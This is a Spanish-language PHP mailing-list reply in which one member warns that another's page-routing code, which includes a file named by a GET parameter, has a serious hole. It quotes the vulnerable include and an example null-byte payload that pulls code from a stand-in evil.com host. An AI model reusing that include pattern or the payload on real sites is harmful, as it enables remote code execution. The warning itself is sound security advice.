1/2 OT Mod_Rewrite Apache
Cristian Rodriguez
judas.iscariote en gmail.com
Jue Feb 8 21:16:02 CLST 2007
El 8/02/07, Daniel Carrero Canales <dcarrero en vallenar.cl> escribió:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Estimados:
> Tengo una idea con el mod_rewrite de Apache para URLS accesibles, hago
> una pagina (prpmantencion.php) a la cual le envio secciones por GET
> (prpmantencion.php?gls_sec=usuario) y dependiendo de la seccion muestra
> el contenido ej:
>
> $gls_sec =$_GET['gls_sec'];
> if($gls_sec!=""){
> include($gls_sec.".php");
las tres primeras lienase de tu codigo tienen un atroz agujero de seguridad.
si $_GET['gls_sec'] es por ejemplo
$_GET['gls_sec'] = "http://www.evil.com/evil.txt%00" (notese el NULL
byte al final)
PHP descarta el ".php" (y el resto de la sentencia) incluyendo el
archivo remoto http://www.evil.com/evil.txt y intepretandolo como
codigo PHP. en fin the OwNean :-P
Más información sobre la lista de distribución PHP